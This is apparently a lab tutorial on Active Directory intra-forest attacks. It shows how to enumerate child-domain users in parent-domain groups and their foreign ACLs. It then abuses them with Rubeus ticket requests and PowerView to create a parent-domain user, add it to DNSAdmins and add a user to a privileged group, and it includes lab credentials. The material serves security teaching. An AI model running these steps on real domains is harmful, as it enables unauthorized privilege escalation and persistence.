Intra-Forest Attacks - Foreign Groups & ACL Principals
1. Lab Environment
- DC02 (child domain controller, dev.inlanefreight.ad) - 10.129.229.207 (DHCP) / 172.16.210.3 (dual NIC)
- DC01 (parent domain controller, inlanefreight.ad) - 172.16.210.99
- Credentials on DC02: Administrator / HTB_@cademy_adm!
2. Foreign Groups
Within a forest, users and groups from a child domain can be added to groups in the parent domain. In addition, every security group in AD is assigned a scope, which determines where in the domain tree or forest the group can be applied.
AD provides the following group scopes:
| Scope | Possible Members |
|---|---|
| Universal | Accounts from any domain in the same forest, global groups from any domain in the same forest, and other universal groups from any domain in the same forest. |
| Global | Accounts from the same domain and other global groups from the same domain. |
| Domain Local | Accounts from any domain or any trusted domain, global groups from any domain or any trusted domain, universal groups from any domain in the same forest, and other domain local groups from the same domain. Accounts, global groups and universal groups from other forests and external domains are also allowed. |
As the table shows, a parent domain can include child-domain users in its universal or domain local groups.
This is possible because global groups are strictly limited to members from their own domain. Universal and domain local groups are therefore the mechanisms by which child-domain users are brought into the parent domain's group structure to provide broader resource access and permission management across domains of the same forest.
Besides these three scopes, the default groups in the Builtin container have the Builtin Local scope; neither the scope nor the group type of these groups can be changed.
2.1. Enumerating Foreign Group Members
PowerView's Get-DomainForeignUser function enumerates users who are members of groups outside their own domain, i.e. a user's outbound access into other domains of the forest.
2.1.1. Enumerating Members of Parent-Domain Groups
*Evil-WinRM* PS C:\Users\Administrator\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-DomainForeignUser
UserDomain : dev.INLANEFREIGHT.AD
UserName : jerry
UserDistinguishedName : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD
GroupDomain : INLANEFREIGHT.AD
GroupName : Inlanefreight_admins
GroupDistinguishedName : CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD
UserDomain : dev.INLANEFREIGHT.AD
UserName : jerry
UserDistinguishedName : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD
GroupDomain : INLANEFREIGHT.AD
GroupName : Inlanefreight_admins_bak
GroupDistinguishedName : CN=Inlanefreight_admins_bak,CN=Users,DC=INLANEFREIGHT,DC=AD
- The child-domain user DEV\jerry is a member of the parent-domain groups Inlanefreight_admins and Inlanefreight_admins_bak.
2.1.2. Enumerating More Information About the Parent-Domain Group
Use PowerView's Get-DomainGroup function to collect full information about the Inlanefreight_admins group:
PS C:\Users\Administrator\Documents> Get-DomainGroup -Identity 'Inlanefreight_admins' -domain inlanefreight.ad
usncreated : 61628
admincount : 1
grouptype : UNIVERSAL_SCOPE, SECURITY
samaccounttype : GROUP_OBJECT
samaccountname : Inlanefreight_admins
whenchanged : 4/8/2024 10:20:24 AM
objectsid : S-1-5-21-2879935145-656083549-3766571964-2108
objectclass : {top, group}
cn : Inlanefreight_admins
usnchanged : 86372
dscorepropagationdata : {4/8/2024 10:20:24 AM, 1/1/1601 12:00:00 AM}
memberof : CN=Account Operators,CN=Builtin,DC=INLANEFREIGHT,DC=AD
distinguishedname : CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD
name : Inlanefreight_admins
member : CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD
whencreated : 3/20/2024 10:05:01 PM
instancetype : 4
objectguid : 6ad8005c-99c1-40f5-b66a-3bd9fe885b97
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=INLANEFREIGHT,DC=AD
- The output shows that Inlanefreight_admins is a UNIVERSAL_SCOPE security group (consistent with the table above: only universal and domain local groups can hold child-domain users) and that it is itself a member of the parent domain's Account Operators group. Through this nesting, DEV\jerry effectively holds Account Operators rights in the parent domain.
BloodHound can also be used to analyse this.
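Get-DomainForeignUser only lists direct foreign memberships; the Account Operators link above only became visible after a second query on the group. The Python below is an added example (not code from the page, PowerView or BloodHound) that walks memberOf chains over hand-constructed directory records mirroring the objects on this page, so the transitive path from DEV\jerry into the parent domain's Account Operators group is computed in one step. The records, the PRIVILEGED_CN list and the function names are this example's own assumptions; in practice the memberOf values would come from an LDAP query or from Get-DomainUser/Get-DomainGroup.

```python
"""Added example (not from the original page): resolve the effective group
membership of a foreign user across domains from directory records.

The records below are constructed by hand to mirror the PowerView output on
this page. No LDAP query is performed.
"""
from collections import deque

# Constructed sample directory: DN -> list of memberOf DNs.
DIRECTORY = {
    "CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD": [
        "CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD",
        "CN=Inlanefreight_admins_bak,CN=Users,DC=INLANEFREIGHT,DC=AD",
    ],
    "CN=Inlanefreight_admins,CN=Users,DC=INLANEFREIGHT,DC=AD": [
        "CN=Account Operators,CN=Builtin,DC=INLANEFREIGHT,DC=AD",
    ],
    "CN=Inlanefreight_admins_bak,CN=Users,DC=INLANEFREIGHT,DC=AD": [],
    "CN=Account Operators,CN=Builtin,DC=INLANEFREIGHT,DC=AD": [],
    # a same-domain user with no foreign membership, for contrast (constructed)
    "CN=bob,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD": [
        "CN=Dev Staff,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD",
    ],
    "CN=Dev Staff,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD": [],
}

# Default groups worth flagging when reached through nesting (assumed list).
PRIVILEGED_CN = {"Account Operators", "Domain Admins", "Enterprise Admins",
                 "Administrators", "Server Operators", "Backup Operators"}


def domain_of(dn):
    """DNS domain encoded in the DC= components of a DN (no escaped commas assumed)."""
    parts = [p[3:] for p in dn.split(",") if p.upper().startswith("DC=")]
    return ".".join(parts).lower()


def cn_of(dn):
    """Leading RDN value of a DN, e.g. 'jerry' for 'CN=jerry,...'."""
    return dn.split(",")[0][3:]


def effective_groups(user_dn, directory):
    """BFS over memberOf; returns {group_dn: path} for every transitive group."""
    found = {}
    queue = deque([(user_dn, [user_dn])])
    while queue:
        dn, path = queue.popleft()
        for grp in directory.get(dn, []):
            if grp in found:          # already reached: avoids loops in nested groups
                continue
            found[grp] = path + [grp]
            queue.append((grp, path + [grp]))
    return found


def foreign_memberships(user_dn, directory):
    """Groups the user is in (directly or nested) that live in another domain."""
    home = domain_of(user_dn)
    return {g: p for g, p in effective_groups(user_dn, directory).items()
            if domain_of(g) != home}


def privileged_reach(user_dn, directory):
    """Privileged default groups reachable through nesting, keyed by CN, with the path."""
    return {cn_of(g): p for g, p in effective_groups(user_dn, directory).items()
            if cn_of(g) in PRIVILEGED_CN}


if __name__ == "__main__":
    jerry = "CN=jerry,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD"
    for g, path in foreign_memberships(jerry, DIRECTORY).items():
        print("foreign:", " -> ".join(cn_of(x) for x in path))
    for g, path in privileged_reach(jerry, DIRECTORY).items():
        print("privileged:", g, "via", " -> ".join(cn_of(x) for x in path))
```

Running it prints the three foreign memberships and the path jerry -> Inlanefreight_admins -> Account Operators; the same walk over real memberOf data is what BloodHound's "MemberOf" edges give you graphically.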
2.2. Abusing Foreign Group Membership
The steps are: first create a sacrificial logon session (a new powershell.exe process started by Rubeus with a netonly logon) so that any tickets already cached in the current session are left untouched, then use Rubeus to request a TGT for DEV\jerry and inject it into that new session.
2.2.1. Creating a Sacrificial Logon Session with Rubeus
PS C:\Users\Administrator\Documents> ./Rubeus createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : I2JKQHMT
[*] Domain : 71XHFF2W
[*] Password : 7TJU7P5W
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 1720
[+] LUID : 0x32f9cd
This opens a new PowerShell window. In it we can safely request a ticket for jerry without interfering with the tickets shown by klist in the original session.
2.2.2. Requesting jerry's TGT with Rubeus
PS C:\Users\Administrator\Documents> .\Rubeus.exe asktgt /user:jerry /password:jerry /domain:dev.inlanefreight.ad /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 7C4EE43396C9A7B9EE52CED09DB516EA
[*] Building AS-REQ (w/ preauth) for: 'dev.inlanefreight.ad\jerry'
[*] Using domain controller: fe80::dcc7:cfe1:1414:803d%14:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
a3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZA==
[+] Ticket successfully imported!
ServiceName : krbtgt/dev.inlanefreight.ad
ServiceRealm : DEV.INLANEFREIGHT.AD
UserName : jerry (NT_PRINCIPAL)
UserRealm : DEV.INLANEFREIGHT.AD
StartTime : 3/8/2026 4:54:21 AM
EndTime : 3/8/2026 2:54:21 PM
RenewTill : 3/15/2026 4:54:21 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : rNxNjtyKUvH++asco5iVLg==
ASREP (key) : 7C4EE43396C9A7B9EE52CED09DB516EA
2.2.3. Creating a New Domain User in the Parent Domain
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $SecPassword = ConvertTo-SecureString 'T3st@123' -AsPlainText -Force
PS C:\Tools> New-DomainUser -Domain inlanefreight.ad -SamAccountName testuser -AccountPassword $SecPassword
AdvancedSearchFilter : System.DirectoryServices.AccountManagement.AdvancedFilters
Enabled : True
<SNIP>
DisplayName : testuser
SamAccountName : testuser
UserPrincipalName :
Sid : S-1-5-21-2879935145-656083549-3766571964-2603
Guid : 6fa60861-806e-4706-90f3-db7b525bb40d
DistinguishedName : CN=testuser,CN=Users,DC=INLANEFREIGHT,DC=AD
StructuralObjectClass : user
Name : testuser
Using the Account Operators rights inherited through the group nesting, a new user named testuser was created in the parent domain. We can also add this user to the DNSAdmins group. Account Operators cannot modify groups protected by AdminSDHolder (such as Domain Admins or Administrators), but DNSAdmins is not protected by default, so the following works. Add-ADGroupMember is the cmdlet from the ActiveDirectory (RSAT) module, run from the same sacrificial session that holds jerry's TGT; the PowerView equivalent is Add-DomainGroupMember.
2.2.4. Adding the Created User to the DNSAdmins Group
Add-ADGroupMember -identity "DNSAdmins" -Members testuser -Server inlanefreight.ad
3. Foreign ACL Principals
Users or groups in a child domain may also hold access control entries on groups or users in the parent domain, such as GenericAll, WriteProperty, GenericWrite, WriteDacl or WriteOwner.
By assigning ACL permissions on parent-domain groups or users, administrators can grant child-domain users varying levels of access to the resources, directories or other objects those groups govern. Depending on the specific rights assigned, this can include the ability to read, write, modify or delete the target objects.
3.1. Enumerating Foreign ACL Principals
PowerView's Get-DomainObjectACL function can be used for targeted enumeration.
In the example below, we enumerate every object in the parent domain on which the user rita holds rights. This is done by resolving the user's SID (security identifier) into the $sid variable and comparing it against the SecurityIdentifier property of each ACE. Because the commands are run from a host in the child domain, Convert-NameToSid rita resolves rita in dev.inlanefreight.ad.
3.1.1. Enumerating the ACLs of the User rita
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> $sid = Convert-NameToSid rita
PS C:\Tools> Get-DomainObjectAcl -ResolveGUIDs -Identity * -domain inlanefreight.ad | ? {$_.SecurityIdentifier -eq $sid}
AceType : AccessAllowed
ObjectDN : CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2110
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2103
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
- The child-domain user DEV\rita has GenericAll over the parent-domain group Infrastructure (AccessMask 983551 = 0xF01FF, the full GenericAll mask).
BloodHound can enumerate this as well.
3.2. Abusing Foreign ACL Principals
3.2.1. Creating a Sacrificial Logon Session with Rubeus
As before, first create a sacrificial session with Rubeus so that tickets already in memory are not affected:
PS C:\Tools> ./Rubeus createnetonly /program:powershell.exe /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Create Process (/netonly)
[*] Using random username and password.
[*] Showing process : True
[*] Username : FLTNQYMI
[*] Domain : YH4TURBL
[*] Password : KNNI2TMI
[+] Process : 'powershell.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 4752
[+] LUID : 0x52dacc
3.2.2. Requesting rita's TGT
PS C:\Tools> .\Rubeus.exe asktgt /user:rita /password:rita /domain:dev.inlanefreight.ad /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 7C4EE43396C9A7B9EE52CED09DB516EA
[*] Building AS-REQ (w/ preauth) for: 'dev.inlanefreight.ad\rita'
[*] Using domain controller: fe80::7553:b64f:4793:6013%14:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF9DCCBfCgAwIBBaEDAgEWooIE9DCCBPBhggTsMIIE6KADAgEFoRYbFERFVi5JTkxBTkVGUkVJR0hU
LkFEoikwJ6ADAgECoSAwHhsGa3JidGd0GxRkZXYuaW5sYW5lZnJlaWdodC5hZKOCBJwwggSYoAMCARKh
AwIBAqKCBIoEggSGilB6VD8Uji1ZMkbCAbtF1ghhfskgkn954xp6XnXR9ExHwq1dvKhPoqizpC/PGaas
1hPGKjEAyS6kZYqPyru9842uUduREtSxw8aOQ1dtPZAuimtA8AP8DEcU8bGqTgx05BJ+BS7D+9dVBlZR
Lfh5Dyw+SDX5u7GRO2HmObVpRPLLQhu9YPa2WJ9hBVEYmEt+4S+AGS50gLQckAgGmh/d61c0V6jNzPze
20wcH9/dJfc2N1bSAxs0V8A2XQoyw4QFj2QP1/GaUQCxmPDhhl5e7l5C1/OqX7vHt2ccI9DfrZNWZm+L
x2V+jTanTR6TMwlWFocSfREJyjZcJVGaVzH1eHvBBKyFr7Dwhifuq5witlno/+yto77OOl5YlehtL7IW
/aeRPVsAMWXTHBTHbH4pbGjmPW8pGZPWTza3aGQvjWtbyOdZjVIHeSvuyT2rpop22WT0MiFpOQElbGF0
cYE31Sao5Bkr1LfP0yeWwkQhnjb63YN+EgZ8AVlDFsavA9pblq/ZsjLJwoR8+EykSxf4roe33PbnZ/GK
o34dnPCtYu7laQEbCfk6oWEZQpbYBkYh7oKQ8DENgLevOSKLcFsU+E2b0yeiTzdfCUtUaf9pqgay77Q9
<SNIP>
[+] Ticket successfully imported!
ServiceName : krbtgt/dev.inlanefreight.ad
ServiceRealm : DEV.INLANEFREIGHT.AD
UserName : rita
UserRealm : DEV.INLANEFREIGHT.AD
StartTime : 3/21/2024 3:18:59 PM
EndTime : 3/22/2024 1:18:59 AM
RenewTill : 3/28/2024 3:18:59 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 0eyJFXdpfTrRx1miTy+qSQ==
ASREP (key) : 7C4EE43396C9A7B9EE52CED09DB516EA
Because rita has GenericAll over the parent-domain group Infrastructure (which includes the right to write the group's member attribute), PowerView's Add-DomainGroupMember function can be used to add DEV\rita herself to the Infrastructure group in the parent domain:
3.2.3. Adding rita to the Parent-Domain Infrastructure Group
PS C:\Tools> Add-DomainGroupMember -identity 'Infrastructure' -Members 'DEV\rita' -Domain inlanefreight.ad -Verbose
VERBOSE: [Get-PrincipalContext] Binding to domain 'inlanefreight.ad'
VERBOSE: [Get-PrincipalContext] Binding to domain 'dev.INLANEFREIGHT.AD'
VERBOSE: [Add-DomainGroupMember] Adding member 'DEV\rita' to group 'Infrastructure'
Verify the result:
PS C:\Tools> Get-DomainGroupMember -Identity 'Infrastructure' -Domain inlanefreight.ad -Verbose
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC02.DEV.INLANEFREIGHT.AD/DC=inlanefreight,DC=ad
VERBOSE: [Get-DomainGroupMember] Get-DomainGroupMember filter string:
(&(objectCategory=group)(|(samAccountName=Infrastructure)))
VERBOSE: [Get-DomainSearcher] search base: LDAP://DC02.DEV.INLANEFREIGHT.AD/DC=inlanefreight,DC=ad
VERBOSE: [Get-DomainObject] Get-DomainObject filter string:
(&(|(distinguishedname=CN=rita,CN=Users,DC=dev,DC=INLANEFREIGHT,DC=AD)))
3.3. Enumerating the ACLs of All Foreign Principals
The following script (saved as get-all-foreign-acl.ps1) collects every ACE in the target domain that grants a write-type right to a principal whose SID does not belong to that domain:
# get-all-foreign-acl.ps1
# Filter conditions, in order:
#   1. write-type rights only (rights that allow modifying the object)
#   2. allow ACEs only (AccessAllowed / AccessAllowedObject)
#   3. RID >= 1000, which skips default and well-known principals (e.g. RID 512, 519)
#   4. principal SID not from the target domain itself
$Domain = "inlanefreight.ad"
$DomainSid = Get-DomainSid $Domain
Get-DomainObjectAcl -Domain $Domain -ResolveGUIDs -Identity * | ? {
($_.ActiveDirectoryRights -match 'WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner') -and `
($_.AceType -match 'AccessAllowed') -and `
($_.SecurityIdentifier -match '^S-1-5-.*-[1-9]\d{3,}$') -and `
($_.SecurityIdentifier -notmatch $DomainSid)
}
In large domains this enumeration consumes a lot of time and resources, so it is advisable to focus first on principals that are already compromised or on high-value targets.
3.3.1. Enumerating the Foreign ACLs of All Principals
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> .\get-all-foreign-acl.ps1
AceType : AccessAllowed
ObjectDN : CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2110
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2103
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Server Admins,CN=Users,DC=INLANEFREIGHT,DC=AD
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
OpaqueLength : 0
ObjectSID : S-1-5-21-2879935145-656083549-3766571964-2111
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-2901893446-2198612369-2488268719-2105
AccessMask : 131132
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
<SNIP>
The script uses the Get-DomainObjectAcl cmdlet to enumerate the ACLs of all domain objects. The Where-Object filter keeps ACEs matching specific criteria: the Active Directory rights (write-type rights only), the ACE type (AccessAllowed) and a pattern match on the Security Identifier (SID). The RID part of the pattern (a trailing RID of 1000 or more) deliberately drops default and well-known principals such as Domain Admins (RID 512) or Enterprise Admins (RID 519), and the final -notmatch drops principals that belong to the target domain itself, so what remains are the ACEs granted to non-default principals from other domains of the forest, whether users or groups.
The principals in the output are only identified by SID, which is not very readable; the following command resolves a SID to an account name:
PS C:\Tools> ConvertFrom-SID S-1-5-21-2901893446-2198612369-2488268719-2103
DEV\rita
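The filter in 3.1 and the script in 3.3 rely on two things PowerView does for us: turning the raw AccessMask into ActiveDirectoryRights names, and deciding which ACEs belong to a principal outside the target domain. The following Python is an added example, not part of the original page or of PowerView; it re-implements both steps offline over hand-constructed ACE records. The two domain SIDs, the masks 983551 and 131132 and the RIDs 2103/2105 are taken from the page's output; the extra same-domain, BUILTIN, read-only and deny entries are constructed to show what the filter drops. Names such as decode_rights and find_foreign_write_aces are this example's own.

```python
"""Added example (not part of the original page or of PowerView): decode an
ActiveDirectoryRights AccessMask and apply the foreign-ACE filter from
get-all-foreign-acl.ps1 offline, over constructed ACE records."""
import re

# System.DirectoryServices.ActiveDirectoryRights flag values.
RIGHTS = {
    "CreateChild": 0x1, "DeleteChild": 0x2, "ListChildren": 0x4, "Self": 0x8,
    "ReadProperty": 0x10, "WriteProperty": 0x20, "DeleteTree": 0x40,
    "ListObject": 0x80, "ExtendedRight": 0x100, "Delete": 0x10000,
    "ReadControl": 0x20000, "GenericExecute": 0x20004, "GenericWrite": 0x20028,
    "WriteDacl": 0x40000, "WriteOwner": 0x80000, "GenericRead": 0x20094,
    "GenericAll": 0xF01FF, "Synchronize": 0x100000,
    "AccessSystemSecurity": 0x1000000,
}

# The same criteria as the PowerShell filter on this page.
WRITE_RIGHTS = {"WriteProperty", "GenericAll", "GenericWrite", "WriteDacl", "WriteOwner"}
RID_RE = re.compile(r"^S-1-5-.*-[1-9]\d{3,}$")

# Domain SIDs taken from the page's output.
PARENT_SID = "S-1-5-21-2879935145-656083549-3766571964"   # INLANEFREIGHT.AD
DEV_SID = "S-1-5-21-2901893446-2198612369-2488268719"      # DEV.INLANEFREIGHT.AD


def decode_rights(mask):
    """Decompose an AccessMask the way .NET's [Flags] ToString does: try the
    largest values first, so 0xF01FF reads as GenericAll rather than as its
    component bits, and 0x2003C as ListChildren, ReadProperty, GenericWrite."""
    names, remaining = set(), mask
    for name, value in sorted(RIGHTS.items(), key=lambda kv: -kv[1]):
        if remaining & value == value:
            names.add(name)
            remaining &= ~value
    return names


def format_rights(mask):
    """Render like PowerView's ActiveDirectoryRights column (ascending by value)."""
    return ", ".join(sorted(decode_rights(mask), key=RIGHTS.__getitem__))


def is_foreign_write_ace(ace, domain_sid):
    """True when the ACE grants a write-type right to a non-default principal
    (RID >= 1000) whose SID is not from domain_sid, the target domain."""
    sid = ace["SecurityIdentifier"]
    return (bool(decode_rights(ace["AccessMask"]) & WRITE_RIGHTS)
            and "AccessAllowed" in ace["AceType"]
            and RID_RE.match(sid) is not None
            and not sid.startswith(domain_sid + "-"))


def find_foreign_write_aces(aces, domain_sid):
    """Apply the filter and return the hits with their decoded rights."""
    return [{"ObjectDN": a["ObjectDN"], "SecurityIdentifier": a["SecurityIdentifier"],
             "Rights": format_rights(a["AccessMask"])}
            for a in aces if is_foreign_write_ace(a, domain_sid)]


# Constructed ACEs: the first two mirror the page's output, the rest show what the filter drops.
SAMPLE_ACES = [
    {"ObjectDN": "CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessAllowed", "AccessMask": 983551, "SecurityIdentifier": DEV_SID + "-2103"},
    {"ObjectDN": "CN=Server Admins,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessAllowed", "AccessMask": 131132, "SecurityIdentifier": DEV_SID + "-2105"},
    # same-domain principal: removed by the domain-SID check
    {"ObjectDN": "CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessAllowed", "AccessMask": 983551, "SecurityIdentifier": PARENT_SID + "-1105"},
    # BUILTIN\Administrators, a well-known SID (RID 544 < 1000): removed by the RID pattern
    {"ObjectDN": "CN=Infrastructure,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessAllowed", "AccessMask": 983551, "SecurityIdentifier": "S-1-5-32-544"},
    # foreign principal with GenericRead only: no write-type right
    {"ObjectDN": "CN=Server Admins,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessAllowed", "AccessMask": 131220, "SecurityIdentifier": DEV_SID + "-2107"},
    # foreign deny ACE: not AccessAllowed
    {"ObjectDN": "CN=Server Admins,CN=Users,DC=INLANEFREIGHT,DC=AD",
     "AceType": "AccessDenied", "AccessMask": 983551, "SecurityIdentifier": DEV_SID + "-2103"},
]

if __name__ == "__main__":
    for hit in find_foreign_write_aces(SAMPLE_ACES, PARENT_SID):
        print(f"{hit['SecurityIdentifier']} -> {hit['Rights']} on {hit['ObjectDN']}")
```

Only the two ACEs from the page survive the filter: GenericAll on Infrastructure for ...-2103 (DEV\rita) and ListChildren, ReadProperty, GenericWrite on Server Admins for ...-2105. Resolving those SIDs to names still needs a live directory (ConvertFrom-SID or an LDAP lookup), which this offline example does not do.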